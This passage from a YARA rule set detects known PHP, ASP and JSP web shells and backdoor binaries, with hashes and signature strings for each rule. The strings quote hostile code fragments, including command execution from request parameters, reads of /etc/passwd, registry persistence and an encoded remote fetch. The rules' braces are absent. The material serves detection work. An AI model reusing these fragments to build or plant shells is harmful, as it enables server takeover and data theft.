   		description = "PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php"   
   		author = "Florian Roth"   
   		hash = "c90b0ba575f432ecc08f8f292f3013b5532fe2c4"   
   	strings:   
   		$s8 = "- AK-74 Security Team Web Site: www.ak74-team.net" fullword   
   		$s9 = "<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'."   
   		$s10 = "<b><font color=#83000>Execute system commands!</font></b>" fullword   
   	condition:   
   		1 of them   
rule ZXshell2_0_rar_Folder_ZXshell {   
   	meta:   
   		description = "Webshells Auto-generated - file ZXshell.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "246ce44502d2f6002d720d350e26c288"   
   	strings:   
   		$s0 = "WPreviewPagesn"   
   		$s1 = "DA!OLUTELY N"   
   	condition:   
   		all of them   
rule multiple_webshells_0014 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_r577_php_php_r57_Shell_php_php_spy_php_php_s_php_php"   
   		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"   
   		hash1 = "8023394542cddf8aee5dec6072ed02b5"   
   		hash2 = "eed14de3907c9aa2550d95550d1a2d5f"   
   		hash3 = "817671e1bdc85e04cc3440bbd9288800"   
   	strings:   
   		$s0 = "echo ws(2).$lb.\" <a"   
   		$s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']"   
   		$s3 = "if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?(\"dir\"):(\"l"   
   	condition:   
   		2 of them   
rule simple_cmd_html {   
   	meta:   
   		description = "Semi-Auto-generated  - file simple_cmd.html.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "c6381412df74dbf3bcd5a2b31522b544"   
   	strings:   
   		$s1 = "<title>G-Security Webshell</title>" fullword   
   		$s2 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword   
   		$s3 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword   
   		$s4 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword   
   	condition:   
   		all of them   
rule webshell_asp_cmdasp {   
   	meta:   
   		description = "Web Shell - file cmdasp.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "57b51418a799d2d016be546f399c2e9b"   
   	strings:   
   		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword   
   		$s7 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword   
   	condition:   
   		all of them   
rule webshell_jsp_utils {   
   	meta:   
   		description = "Web Shell - file utils.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "9827ba2e8329075358b8e8a53e20d545"   
   	strings:   
   		$s0 = "ResultSet r = c.getMetaData().getTables(null, null, \"%\", t);" fullword   
   		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"   
   	condition:   
   		all of them   
rule webshell_asp_list {   
   	meta:   
   		description = "Web Shell - file list.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "1cfa493a165eb4b43e6d4cc0f2eab575"   
   	strings:   
   		$s0 = "<INPUT TYPE=\"hidden\" NAME=\"type\" value=\"<%=tipo%>\">" fullword   
   		$s4 = "Response.Write(\"<h3>FILE: \" & file & \"</h3>\")" fullword   
   	condition:   
   		all of them   
rule multiple_webshells_0011 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_w_php_php_c99madshell_v2_1_php_php_wacking_php_php_SsEs_php_php_SpecialShell_99_php_php"   
   		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"   
   		hash1 = "3ca5886cd54d495dc95793579611f59a"   
   		hash2 = "9c5bb5e3a46ec28039e8986324e42792"   
   		hash3 = "6cd50a14ea0da0df6a246a60c8f6f9c9"   
   		hash4 = "09609851caa129e40b0d56e90dfc476c"   
   	strings:   
   		$s0 = "else {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA"   
   		$s3 = "else {echo \"<b>File \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec"   
   	condition:   
   		1 of them   
rule FSO_s_ajan_2 {   
   	meta:   
   		description = "Webshells Auto-generated - file ajan.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "22194f8c44524f80254e1b5aec67b03e"   
   	strings:   
   		$s2 = "\"Set WshShell = CreateObject(\"\"WScript.Shell\"\")"   
   		$s3 = "/file.zip"   
   	condition:   
   		all of them   
rule webshell_php_cmd {   
   	meta:   
   		description = "Web Shell - file cmd.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "c38ae5ba61fd84f6bbbab98d89d8a346"   
   	strings:   
   		$s0 = "if($_GET['cmd']) {" fullword   
   		$s1 = "// cmd.php = Command Execution" fullword   
   		$s7 = "  system($_GET['cmd']);" fullword   
   	condition:   
   		all of them   
rule FeliksPack3___PHP_Shells_xIShell {   
   	meta:   
   		description = "Webshells Auto-generated - file xIShell.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "997c8437c0621b4b753a546a53a88674"   
   	strings:   
   		$s3 = "if (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='Java"   
   	condition:   
   		all of them   
rule webshell_sig_404super {   
   	meta:   
   		description = "Web shells - generated from file 404super.php"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "7ed63176226f83d36dce47ce82507b28"   
   	strings:   
   		$s4 = "$i = pack('c*', 0x70, 0x61, 99, 107);" fullword   
   		$s6 = "    'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631')," fullword   
   		$s7 = "//http://require.duapp.com/session.php" fullword   
   		$s8 = "if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}" fullword   
   		$s12 = "//define('pass','123456');" fullword   
   		$s13 = "$GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO"   
   	condition:   
   		1 of them   
rule webshell_MySQL_Web_Interface_Version_0_8 {   
   	meta:   
   		description = "Web Shell - file MySQL Web Interface Version 0.8.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "36d4f34d0a22080f47bb1cb94107c60f"   
   	strings:   
   		$s2 = "href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>"   
   	condition:   
   		all of them   
rule webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit {   
   	meta:   
   		description = "Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"   
   	strings:   
   		$s1 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword   
   	condition:   
   		all of them   
rule HYTop_DevPack_upload {   
   	meta:   
   		description = "Webshells Auto-generated - file upload.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "b09852bda534627949f0259828c967de"   
   	strings:   
   		$s0 = "<!-- PageUpload Below -->"   
   	condition:   
   		all of them   
rule perlbot_pl {   
   	meta:   
   		description = "Semi-Auto-generated  - file perlbot.pl.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "7e4deb9884ffffa5d82c22f8dc533a45"   
   	strings:   
   		$s0 = "my @adms=(\"Kelserific\",\"Puna\",\"nod32\")"   
   		$s1 = "#Acesso a Shel - 1 ON 0 OFF"   
   	condition:   
   		1 of them   
rule WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit {   
   	meta:   
   		description = "PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"   
   		author = "Florian Roth"   
   		hash = "b2b797707e09c12ff5e632af84b394ad41a46fa4"   
   	strings:   
   		$s4 = "$liz0zim=shell_exec($_POST[liz0]); " fullword   
   		$s6 = "$liz0=shell_exec($_POST[baba]); " fullword   
   		$s9 = "echo \"<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass E"   
   		$s12 = " :=) :</font><select size=\"1\" name=\"liz0\">" fullword   
   		$s13 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword   
   	condition:   
   		1 of them   
rule webshell_webshells_new_JSP {   
   	meta:   
   		description = "Web shells - generated from file JSP.jsp"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "495f1a0a4c82f986f4bdf51ae1898ee7"   
   	strings:   
   		$s1 = "void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"   
   		$s5 = "bw.write(z2);bw.close();sb.append(\"1\");}else if(Z.equals(\"E\")){EE(z1);sb.app"   
   		$s11 = "if(Z.equals(\"A\")){String s=new File(application.getRealPath(request.getRequest"   
   	condition:   
   		1 of them   
rule WebShell_go_shell {   
   	meta:   
   		description = "PHP Webshells Github Archive - file go-shell.php"   
   		author = "Florian Roth"   
   		hash = "3dd85981bec33de42c04c53d081c230b5fc0e94f"   
   	strings:   
   		$s0 = "#change this password; for power security - delete this file =)" fullword   
   		$s2 = "if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};" fullword   
   		$s11 = "open(FILEHANDLE, \"cd $param{dir}&&$param{cmd}|\");" fullword   
   		$s12 = "print << \"[kalabanga]\";" fullword   
   		$s13 = "<title>GO.cgi</title>" fullword   
   	condition:   
   		1 of them   
rule FSO_s_c99 {   
   	meta:   
   		description = "Webshells Auto-generated - file c99.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "5f9ba02eb081bba2b2434c603af454d0"   
   	strings:   
   		$s2 = "\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htacce"   
   	condition:   
   		all of them   
rule webshell_cmd_win32 {   
   	meta:   
   		description = "Web Shell - file cmd_win32.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "cc4d4d6cc9a25984aa9a7583c7def174"   
   	strings:   
   		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParam"   
   		$s1 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword   
   	condition:   
   		2 of them   
rule byloader {   
   	meta:   
   		description = "Webshells Auto-generated - file byloader.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "0f0d6dc26055653f5844ded906ce52df"   
   	strings:   
   		$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtfsChk"   
   		$s1 = "Failure ... Access is Denied !"   
   		$s2 = "NTFS Disk Driver Checking Service"   
   		$s3 = "Dumping Description to Registry..."   
   		$s4 = "Opening Service .... Failure !"   
   	condition:   
   		all of them   
rule WebShell_Worse_Linux_Shell {   
   	meta:   
   		description = "PHP Webshells Github Archive - file Worse Linux Shell.php"   
   		author = "Florian Roth"   
   		hash = "64623ab1246bc8f7d256b25f244eb2b41f543e96"   
   	strings:   
   		$s4 = "if( $_POST['_act'] == \"Upload!\" ) {" fullword   
   		$s5 = "print \"<center><h1>#worst @dal.net</h1></center>\";" fullword   
   		$s7 = "print \"<center><h1>Linux Shells</h1></center>\";" fullword   
   		$s8 = "$currentCMD = \"ls -la\";" fullword   
   		$s14 = "print \"<tr><td><b>System type:</b></td><td>$UName</td></tr>\";" fullword   
   		$s19 = "$currentCMD = str_replace(\"\\\\\\\\\",\"\\\\\",$_POST['_cmd']);" fullword   
   	condition:   
   		2 of them   
rule WebShell_NTDaddy_v1_9 {   
   	meta:   
   		description = "PHP Webshells Github Archive - file NTDaddy v1.9.php"   
   		author = "Florian Roth"   
   		hash = "79519aa407fff72b7510c6a63c877f2e07d7554b"   
   	strings:   
   		$s2 = "|     -obzerve : mr_o@ihateclowns.com |" fullword   
   		$s6 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword   
   		$s13 = "<form action=ntdaddy.asp method=post>" fullword   
   		$s17 = "response.write(\"<ERROR: THIS IS NOT A TEXT FILE>\")" fullword   
   	condition:   
   		2 of them   
rule Sincap_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file Sincap.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "b68b90ff6012a103e57d141ed38a7ee9"   
   	strings:   
   		$s0 = "$baglan=fopen(\"/tmp/$ekinci\",'r');"   
   		$s2 = "$tampon4=$tampon3-1"   
   		$s3 = "@aventgrup.net"   
   	condition:   
   		2 of them   
rule webshell_Antichat_Shell_v1_3_2 {   
   	meta:   
   		description = "Web Shell - file Antichat Shell v1.3.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "40d0abceba125868be7f3f990f031521"   
   	strings:   
   		$s3 = "$header='<html><head><title>'.getenv(\"HTTP_HOST\").' - Antichat Shell</title><m"   
   	condition:   
   		all of them   
rule WebShell__PH_Vayv_PHVayv_PH_Vayv {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee"   
   		hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357"   
   		hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653"   
   	strings:   
   		$s4 = "<form method=\"POST\" action=\"<?echo \"PHVayv.php?duzkaydet=$dizin/$duzenle"   
   		$s12 = "<? if ($ekinci==\".\" or  $ekinci==\"..\") {" fullword   
   		$s17 = "name=\"duzenx2\" value=\"Klas" fullword   
   	condition:   
   		2 of them   
rule webshell_asp_Ajan {   
   	meta:   
   		description = "Web Shell - file Ajan.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "b6f468252407efc2318639da22b08af0"   
   	strings:   
   		$s3 = "entrika.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreate"   
   	condition:   
   		all of them   
rule CmdAsp_asp {   
   	meta:   
   		description = "Semi-Auto-generated  - file CmdAsp.asp.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "64f24f09ec6efaa904e2492dffc518b9"   
   	strings:   
   		$s0 = "CmdAsp.asp"   
   		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword   
   		$s2 = "-- Use a poor man's pipe ... a temp file --"   
   		$s3 = "maceo @ dogmile.com"   
   	condition:   
   		2 of them   
rule multiple_webshells_0001 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files 1.txt, c2007.php.php.txt, c100.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_1_c2007_php_php_c100_php"   
   		hash0 = "44542e5c3e9790815c49d5f9beffbbf2"   
   		hash1 = "d089e7168373a0634e1ac18c0ee00085"   
   		hash2 = "38fd7e45f9c11a37463c3ded1c76af4c"   
   	strings:   
   		$s0 = "echo \"<b>Changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\""   
   		$s3 = "echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur"   
   	condition:   
   		1 of them   
rule Antichat_Socks5_Server_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file Antichat Socks5 Server.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "cbe9eafbc4d86842a61a54d98e5b61f1"   
   	strings:   
   		$s0 = "$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);" fullword   
   		$s3 = "#   [+] Domain name address type"   
   		$s4 = "www.antichat.ru"   
   	condition:   
   		1 of them   
rule FSO_s_sincap {   
   	meta:   
   		description = "Webshells Auto-generated - file sincap.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "dc5c2c2392b84a1529abd92e98e9aa5b"   
   	strings:   
   		$s0 = "    <font color=\"#E5E5E5\" style=\"font-size: 8pt; font-weight: 700\" face=\"Arial\">"   
   		$s4 = "<body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin="   
   	condition:   
   		all of them   
rule WebShell_CmdAsp_asp_php {   
   	meta:   
   		description = "PHP Webshells Github Archive - file CmdAsp.asp.php.txt"   
   		author = "Florian Roth"   
   		hash = "cb18e1ac11e37e236e244b96c2af2d313feda696"   
   	strings:   
   		$s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword   
   		$s4 = "' Author: Maceo <maceo @ dogmile.com>" fullword   
   		$s5 = "' -- Use a poor man's pipe ... a temp file -- '" fullword   
   		$s6 = "' --------------------o0o--------------------" fullword   
   		$s8 = "' File: CmdAsp.asp" fullword   
   		$s11 = "<-- CmdAsp.asp -->" fullword   
   		$s14 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword   
   		$s16 = "Set oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")" fullword   
   		$s19 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword   
   	condition:   
   		4 of them   
rule webshell_customize {   
   	meta:   
   		description = "Web Shell - file customize.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "d55578eccad090f30f5d735b8ec530b1"   
   	strings:   
   		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"   
   	condition:   
   		all of them   
rule multiple_webshells_0024 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files antichat.php.php.txt, Fatalshell.php.php.txt, a_gedit.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_antichat_php_php_Fatalshell_php_php_a_gedit_php_php"   
   		hash0 = "128e90b5e2df97e21e96d8e268cde7e3"   
   		hash1 = "b15583f4eaad10a25ef53ab451a4a26d"   
   		hash2 = "ab9c6b24ca15f4a1b7086cad78ff0f78"   
   	strings:   
   		$s0 = "if(@$_POST['save'])writef($file,$_POST['data']);" fullword   
   		$s1 = "if($action==\"phpeval\"){" fullword   
   		$s2 = "$uploadfile = $dirupload.\"/\".$_POST['filename'];" fullword   
   		$s3 = "$dir=getcwd().\"/\";" fullword   
   	condition:   
   		2 of them   
rule webshell_mysqlwebsh {   
   	meta:   
   		description = "Web Shell - file mysqlwebsh.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "babfa76d11943a22484b3837f105fada"   
   	strings:   
   		$s3 = " <TR><TD bgcolor=\"<? echo (!$CONNECT && $action == \"chparam\")?\"#660000\":\"#"   
   	condition:   
   		all of them   
rule myshell_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file myshell.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "62783d1db52d05b1b6ae2403a7044490"   
   	strings:   
   		$s0 = "@chdir($work_dir) or ($shellOutput = \"MyShell: can't change directory."   
   		$s1 = "echo \"<font color=$linkColor><b>MyShell file editor</font> File:<font color"   
   		$s2 = " $fileEditInfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$"   
   	condition:   
   		2 of them   
rule Zehir_4_asp {   
   	meta:   
   		description = "Semi-Auto-generated  - file Zehir 4.asp.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "7f4e12e159360743ec016273c3b9108c"   
   	strings:   
   		$s2 = "</a><a href='\"&dosyapath&\"?status=10&dPath=\"&f1.path&\"&path=\"&path&\"&Time="   
   		$s4 = "<input type=submit value=\"Test Et!\" onclick=\""   
   	condition:   
   		1 of them   
rule _root_040_zip_Folder_deploy {   
   	meta:   
   		description = "Webshells Auto-generated - file deploy.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "2c9f9c58999256c73a5ebdb10a9be269"   
   	strings:   
   		$s5 = "halon synscan 127.0.0.1 1-65536"   
   		$s8 = "Obviously you replace the ip address with that of the target."   
      
   	condition:   
   		all of them   
rule webshell_phpshell3 {   
   	meta:   
   		description = "Web Shell - file phpshell3.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "76117b2ee4a7ac06832d50b2d04070b8"   
   	strings:   
   		$s2 = "<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_SESSION['nounce'];"   
   		$s5 = "<p>Username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna"   
   		$s7 = "$_SESSION['output'] .= \"cd: could not change to: $new_dir\\n\";" fullword   
   	condition:   
   		2 of them   
rule AJAX_FileUpload_webshell {   
   	meta:   
   		description = "AJAX JS/CSS components providing web shell by APT groups"   
   		author = "F.Roth"   
   		date = "12.10.2014"   
   		score = 75   
   		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/ajaxfileupload.js"   
   	strings:   
   		$a1 = "var frameId = 'jUploadFrame' + id;" ascii   
   		$a2 = "var form = jQuery('<form  action=\"\" method=\"POST\" name=\"' + formId + '\" id=\"' + formId + '\" enctype=\"multipart/form-data\"></form>');" ascii   
   		$a3 = "jQuery(\"<div>\").html(data).evalScripts();" ascii   
   	condition:   
   		all of them   
rule STNC_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file STNC.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "2e56cfd5b5014cbbf1c1e3f082531815"   
   	strings:   
   		$s0 = "drmist.ru" fullword   
   		$s1 = "hidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80"   
   		$s2 = "STNC WebShell"   
   		$s3 = "http://www.security-teams.net/index.php?showtopic="   
   	condition:   
   		1 of them   
rule webshell_jsp_guige02 {   
   	meta:   
   		description = "Web Shell - file guige02.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "a3b8b2280c56eaab777d633535baf21d"   
   	strings:   
   		$s0 = "????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff"   
   		$s1 = "<%@page contentType=\"text/html; charset=GBK\" import=\"java.io.*;\"%><%!private"   
   	condition:   
   		all of them   
rule HYTop2006_rar_Folder_2006X {   
   	meta:   
   		description = "Webshells Auto-generated - file 2006X.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "cf3ee0d869dd36e775dfcaa788db8e4b"   
   	strings:   
   		$s1 = "<input name=\"password\" type=\"password\" id=\"password\""   
   		$s6 = "name=\"theAction\" type=\"text\" id=\"theAction\""   
   	condition:   
   		all of them   
rule WebShell_WinX_Shell {   
   	meta:   
   		description = "PHP Webshells Github Archive - file WinX Shell.php"   
   		author = "Florian Roth"   
   		hash = "a94d65c168344ad9fa406d219bdf60150c02010e"   
   	strings:   
   		$s4 = "// It's simple shell for all Win OS." fullword   
   		$s5 = "//------- [netstat -an] and [ipconfig] and [tasklist] ------------" fullword   
   		$s6 = "<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>" fullword   
   		$s13 = "// Created by greenwood from n57" fullword   
   		$s20 = " if (is_uploaded_file($userfile)) {" fullword   
   	condition:   
   		3 of them   
rule fuckphpshell_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file fuckphpshell.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "554e50c1265bb0934fcc8247ec3b9052"   
   	strings:   
   		$s0 = "$succ = \"Warning! "   
   		$s1 = "Don`t be stupid .. this is a priv3 server, so take extra care!"   
   		$s2 = "\\*=-- MEMBERS AREA --=*/"   
   		$s3 = "preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_SESSION['o"   
   	condition:   
   		2 of them   
rule WebShell_PHANTASMA {   
   	meta:   
   		description = "PHP Webshells Github Archive - file PHANTASMA.php"   
   		author = "Florian Roth"   
   		hash = "cd12d42abf854cd34ff9e93a80d464620af6d75e"   
   	strings:   
   		$s12 = "\"    printf(\\\"Usage: %s [Host] <port>\\\\n\\\", argv[0]);\\n\" ." fullword   
   		$s15 = "if ($portscan != \"\") {" fullword   
   		$s16 = "echo \"<br>Banner: $get <br>\";" fullword   
   		$s20 = "$dono = get_current_user( );" fullword   
   	condition:   
   		3 of them   
rule webshell_ASP_zehir4 {   
   	meta:   
   		description = "Web Shell - file zehir4.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "7f4e12e159360743ec016273c3b9108c"   
   	strings:   
   		$s9 = "Response.Write \"<a href='\"&dosyaPath&\"?status=7&Path=\"&Path&\"/"   
   	condition:   
   		all of them   
rule webshell_NIX_REMOTE_WEB_SHELL_NIX_REMOTE_WEB_xxx1 {   
   	meta:   
   		description = "Web Shell - from files NIX REMOTE WEB-SHELL.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, KAdot Universal Shell v0.1.6.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "0b19e9de790cd2f4325f8c24b22af540"   
   		hash1 = "f3ca29b7999643507081caab926e2e74"   
   		hash2 = "527cf81f9272919bf872007e21c4bdda"   
   	strings:   
   		$s1 = "<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type="   
   		$s2 = "$uploadfile = $_POST['path'].$_FILES['file']['name'];" fullword   
   		$s6 = "elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}" fullword   
   		$s7 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}" fullword   
   	condition:   
   		2 of them   
rule thelast_orice2 {   
   	meta:   
   		description = "Webshells Auto-generated - file orice2.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "aa63ffb27bde8d03d00dda04421237ae"   
   	strings:   
   		$s0 = " $aa = $_GET['aa'];"   
   		$s1 = "echo $aa;"   
   	condition:   
   		all of them   
rule Debug_BDoor {   
   	meta:   
   		description = "Webshells Auto-generated - file BDoor.dll"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "e4e8e31dd44beb9320922c5f49739955"   
   	strings:   
   		$s1 = "\\BDoor\\"   
   		$s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"   
   	condition:   
   		all of them   
rule WebShell_PhpSpy_Ver_2006 {   
   	meta:   
   		description = "PHP Webshells Github Archive - file PhpSpy Ver 2006.php"   
   		author = "Florian Roth"   
   		hash = "34a89e0ab896c3518d9a474b71ee636ca595625d"   
   	strings:   
   		$s2 = "var_dump(@$shell->RegRead($_POST['readregname']));" fullword   
   		$s12 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."   
   		$s19 = "$program = isset($_POST['program']) ? $_POST['program'] : \"c:\\winnt\\system32"   
   		$s20 = "$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\\winnt\\backdoor.exe'"   
   	condition:   
   		1 of them   
rule webshell_r57shell127_r57_kartal_r57 {   
   	meta:   
   		description = "Web Shell - from files r57shell127.php, r57_kartal.php, r57.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "ae025c886fbe7f9ed159f49593674832"   
   		hash1 = "1d912c55b96e2efe8ca873d6040e3b30"   
   		hash2 = "4108f28a9792b50d95f95b9e5314fa1e"   
   	strings:   
   		$s2 = "$handle = @opendir($dir) or die(\"Can't open directory $dir\");" fullword   
   		$s3 = "if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }" fullword   
   		$s5 = "if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_"   
   	condition:   
   		2 of them   
rule multiple_php_webshells {   
   	meta:   
   		description = "Semi-Auto-generated  - from files multiple_php_webshells"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"   
   		hash1 = "911195a9b7c010f61b66439d9048f400"   
   		hash2 = "be0f67f3e995517d18859ed57b4b4389"   
   		hash3 = "eddf7a8fde1e50a7f2a817ef7cece24f"   
   		hash4 = "8023394542cddf8aee5dec6072ed02b5"   
   		hash5 = "eed14de3907c9aa2550d95550d1a2d5f"   
   		hash6 = "817671e1bdc85e04cc3440bbd9288800"   
   		hash7 = "7101fe72421402029e2629f3aaed6de7"   
   		hash8 = "f618f41f7ebeb5e5076986a66593afd1"   
   	strings:   
   		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"   
